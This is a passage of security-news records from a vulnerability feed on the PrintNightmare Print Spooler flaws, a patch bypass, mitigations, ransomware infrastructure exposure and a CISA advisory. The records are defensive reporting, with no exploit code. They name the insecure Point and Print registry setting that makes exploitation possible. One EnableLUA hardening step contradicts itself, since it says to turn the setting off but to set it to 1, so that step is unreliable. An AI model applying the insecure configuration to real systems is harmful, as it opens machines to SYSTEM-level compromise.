"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![](https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg)](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. \"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:19", "description": "[![windows printer spooler vulnerability](https://thehackernews.com/images/-bi5ZcqZAriI/YPUgr-nwSjI/AAAAAAAADPc/Vyz_FgNnVwEF-E_EP0oMclWiGQCCSplZACLcBGAsYHQ/s728-e1000/Windows-Printer-Spooler-Vulnerability.jpg)](<https://thehackernews.com/images/-bi5ZcqZAriI/YPUgr-nwSjI/AAAAAAAADPc/Vyz_FgNnVwEF-E_EP0oMclWiGQCCSplZACLcBGAsYHQ/s0/Windows-Printer-Spooler-Vulnerability.jpg>)\n\nMerely days after Microsoft sounded the alarm on an [unpatched security vulnerability](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) in the Windows Print Spooler service, possibly yet another zero-day flaw in the same component has come to light, making it the fourth printer-related shortcoming to be discovered in recent weeks.\n\n\"Microsoft Windows allows for non-admin users to be able to install printer drivers via Point and Print,\" CERT Coordination Center's Will Dormann [said](<https://kb.cert.org/vuls/id/131152>) in an advisory published Sunday. \"Printers installed via this technique also install queue-specific files, which can be arbitrary libraries to be loaded by the privileged Windows Print Spooler process.\"\n\nAn exploit for the vulnerability was disclosed by security researcher and [Mimikatz creator](<https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/>) [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1416079316673339392>).\n\n> [#printnightmare](<https://twitter.com/hashtag/printnightmare?src=hash&ref_src=twsrc%5Etfw>) \\- Episode 4 \n \nYou know what is better than a Legit Kiwi Printer ? \n\ud83e\udd5dAnother Legit Kiwi Printer...\ud83d\udc4d \n \nNo prerequiste at all, you even don't need to sign drivers/package\ud83e\udd2a [pic.twitter.com/oInb5jm3tE](<https://t.co/oInb5jm3tE>)\n> \n> \u2014 \ud83e\udd5d Benjamin Delpy (@gentilkiwi) [July 16, 2021](<https://twitter.com/gentilkiwi/status/1416079316673339392?ref_src=twsrc%5Etfw>)\n\nSpecifically, the flaw allows a threat actor to execute arbitrary code with SYSTEM privileges on a vulnerable Windows machine by connecting to a malicious print server under their control.\n\nWhile there is no solution to the problem, CERT/CC recommends configuring \"PackagePointAndPrintServerList\" to prevent the installation of printers from arbitrary servers and blocking outbound SMB traffic at the network boundary, given that public exploits for the vulnerability utilize SMB for connectivity to a malicious shared printer.\n\nThe new issue is only the latest evidence of the fallout after the [PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) flaw accidentally became public last month, leading to the discovery of a number of vulnerabilities affecting the Print Spooler service.\n\nGiven the lack of details surrounding [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \u2014 the local privilege escalation (LPE) flaw reported by security researcher Jacob Baines \u2014 [it's not immediately clear](<https://twitter.com/wdormann/status/1416740343597486087>) what connection, if any, the vulnerability and this new Print Spooler signature-check bypass that also allows for LPE may have with one another.\n\nWhen reached for a response, a Microsoft spokesperson told The Hacker News that \"we are investigating reports and will take appropriate action as needed to help keep customers protected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T06:51:00", "type": "thn", "title": "Researcher Uncovers Yet Another Unpatched Windows Printer Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-22T03:40:17", "id": "THN:C2D8045AAD8E4BA5A9168782138B6D52", "href": "https://thehackernews.com/2021/07/researcher-uncover-yet-another.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Microsoft Print Spooler Vulnerability](https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s728-e1000/Microsoft-PrintSpooler-Vulnerability.jpg)](<https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s0/Microsoft-PrintSpooler-Vulnerability.jpg>)\n\nThis week, **PrintNightmare** \\- Microsoft's Print Spooler vulnerability (CVE-2021-34527) was upgraded from a 'Low' criticality to a 'Critical' criticality.\n\nThis is due to a Proof of Concept published on GitHub, which attackers could potentially leverage for gaining access to Domain Controllers.\n\nAs we [reported earlier](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), Microsoft already released a patch in June 2021, but it wasn't enough to stop exploits. Attackers can still use Print Spooler when connecting remotely. You can find all you need to know about this vulnerability in this article and how you can mitigate it (and you can). \n\n**Print Spooler in a nutshell:** Print Spooler is Microsoft's service for managing and monitoring files printing. This service is among Microsoft's oldest and has had minimal maintenance updates since it was released. \n\nEvery Microsoft machine (servers and endpoints) has this feature enabled by default.\n\n**PrintNightmare vulnerability:** As soon as an attacker gains limited user access to a network, he will be able to connect (directly or remotely) to the Print Spooler. Since the Print Spooler has direct access to the kernel, the attacker can use it to gain access to the operating system, run remote code with system privileges, and ultimately attack the Domain Controller.\n\nYour best option when it comes to mitigating the PrintNightmare vulnerability is to disable the Print Spooler on every server and/or sensitive workstation (such as administrators' workstations, direct internet-facing workstations, and non-printing workstations).\n\nThis is what Dvir Goren's, hardening expert and CTO at [CalCom Software Solutions](<https://www.calcomsoftware.com/?utm_source=HN>), suggests as your first move towards mitigation.\n\nFollow these steps to disable the Print Spooler service on Windows 10:\n\n 1. Open Start.\n 2. Search for PowerShell, right-click on it and select the Run as administrator.\n 3. Type the command and press Enter: _Stop-Service -Name Spooler -Force_\n 4. Use this command to prevent the service from starting back up again during restart: Set-Service -Name Spooler -StartupType Disabled\n\nAccording to Dvir's experience, 90% of servers do not require Print Spooler. It is the default configuration for most of them, so it is usually enabled. As a result, disabling it can solve 90% of your problem and have little impact on production.\n\nIn large and complex infrastructures, it can be challenging to locate where Print Spooler is used.\n\nHere are a few examples where Print Spooler is required:\n\n 1. When using Citrix services,\n 2. Fax servers,\n 3. Any application requiring virtual or physical printing of PDFs, XPSs, etc. Billing services and wage applications, for example.\n\nHere are a few examples when Print Spooler is not needed but enabled by default:\n\n 1. Domain Controller and Active Directory \u2013 the main risk in this vulnerability can be neutralized by practicing basic cyber hygiene. It makes no sense to have Print Spooler enabled in DCs and AD servers. \n 2. Member servers such as SQL, File System, and Exchange servers. \n 3. Machines that do not require printing. \n\nA few other hardening steps suggested by Dvir for machines dependent on Print Spooler include:\n\n 1. Replace the vulnerable Print Spooler protocol with a non-Microsoft service. \n 2. By changing 'Allow Print Spooler to accept client connections', you can restrict users' and drivers' access to the Print Spooler to groups that must use it.\n 3. Disable Print Spooler caller in Pre-Windows 2000 compatibility group.\n 4. Make sure that Point and Print is not configured to No Warning \u2013 check registry key SOFTWARE/Policies/Microsoft/Windows NT/Printers/PointAndPrint/NoElevationOnInstall for DWORD value 1 and change it to 0.\n 5. Turn off EnableLUA \u2013 check registry key SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System/EnableLUA for DWORD value 0 and change it to 1.\n\nHere's what you need to do next to ensure your organization is secure:\n\n 1. Identify where Print Spooler is being used on your network. \n 2. Map your network to find the machines that must use Print Spooler.\n 3. Disable Print Spooler on machines that do not use it. \n 4. For machines that require Print Spooler \u2013 configure them in a way to minimize its attack surface. \n\nBeside this, to find potential evidence of exploitation, you should also monitor Microsoft-Windows-PrintService/Admin log entries. There might be entries with error messages that indicate Print Spooler can't load plug-in module DLLs, although this can also happen if an attacker packaged a legitimate DLL that Print Spooler demands.\n\nThe final recommendation from Dvir is to implement these recommendations through[ hardening automation tools](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=HN>). Without automation, you will spend countless hours attempting to harden manually and may end up vulnerable or causing systems to go down\n\nAfter choosing your course of action, a [Hardening automation tool](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=HN>) will discover where Print Spooler is enabled, where they are actually used, and disable or reconfigure them automatically.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T09:32:00", "type": "thn", "title": "How to Mitigate Microsoft Print Spooler Vulnerability \u2013 PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T15:05:22", "id": "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e1000/cert.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\n[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e1000/keys.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[![bug bounty program](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e1000/bug.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[![FBI, CISA and Russian Hackers](https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a 